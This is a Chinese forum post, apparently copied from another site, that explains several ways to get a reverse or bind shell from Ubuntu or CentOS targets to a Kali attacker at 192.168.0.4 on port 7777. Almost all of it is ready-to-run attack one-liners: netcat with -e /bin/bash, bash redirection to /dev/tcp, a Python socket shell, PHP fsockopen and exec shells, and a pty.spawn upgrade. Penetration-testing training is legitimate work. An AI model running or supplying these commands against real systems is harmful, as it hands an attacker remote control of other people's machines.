咔叽游戏

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
查看: 591|回复: 0

[linux shell] 详解NC反弹shell的几种方法

[复制链接]
  • TA的每日心情
    无聊
    2019-4-21 13:02
  • 签到天数: 3 天

    [LV.2]圆转纯熟

    发表于 2020-12-18 18:34:15 | 显示全部楼层 |阅读模式
    假如ubuntu、CentOS为目标服务器系统
    kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用
    最终是将ubuntu、CentOS的shell反弹到kali上
    正向反弹shell

    ubuntu或者CentOS上面输入
    1. nc -lvp 7777 -e /bin/bash
    复制代码
    kali上输入
    1. nc ip 7777
    复制代码
    正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。
    需要目标机安装nc。
    反向反弹shell

    方法1:bash反弹
    1. bash -i >& /dev/tcp/ip/port 0>&1
    复制代码
    但首先需要在kali上使用nc监听端口:
    1. nc -lvp 7777
    复制代码
    此方法在ubuntu下不会反弹成功,CentOS可以反弹成功。
    方法2:python反弹

    反弹shell的命令如下:
    1. python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
    复制代码
    首先,使用nc在kali上监听端口:
    1. nc -lvp 7777
    复制代码
    在CentOS或者ubuntu下使用python去反向连接,输入:
    1. python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.0.4',7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);
    复制代码
    此方法ubuntu和Linux均反弹成功。
    方法3

    首先在kali上输入nc监听:
    1. nc -lvp 7777
    复制代码
    在CentOS或者ubuntu 上使用nc去反向连接,命令如下:
    1. nc -e /bin/bash 192.168.0.4 7777
    复制代码
    方法4:php反弹shell

    首先在kali上输入:
    1. nc -lvp 7777
    复制代码
    然后在目标机上输入:
    1. php- 'exec("/bin/bash -i >& /dev/tcp/192.168.0.4/7777")'
    复制代码

    1. php -r '$sock=fsockopen("192.168.0.4",7777);exec("/bin/bash -i 0>&3 1>&3 2>&3");'
    复制代码
    注意php反弹shell的这些方法都需要php关闭safe_mode这个选项,才可以使用exec函数。
    遇到反弹后不是正常的shell,可用命令:
    1. python -c 'import pty;pty.spawn("/bin/bash")'
    复制代码
    转化为常规的shell。

    到此这篇关于详解NC反弹shell的几种方法的文章就介绍到这了,更多相关NC反弹shell内容请搜索咔叽论坛以前的文章或继续浏览下面的相关文章希望大家以后多多支持咔叽论坛!

    原文地址:https://www.jb51.net/article/197799.htm

    QQ|免责声明|小黑屋|手机版|Archiver|咔叽游戏

    GMT+8, 2024-3-29 19:58

    Powered by Discuz! X3.4

    © 2001-2023 Discuz! Team.

    快速回复 返回顶部 返回列表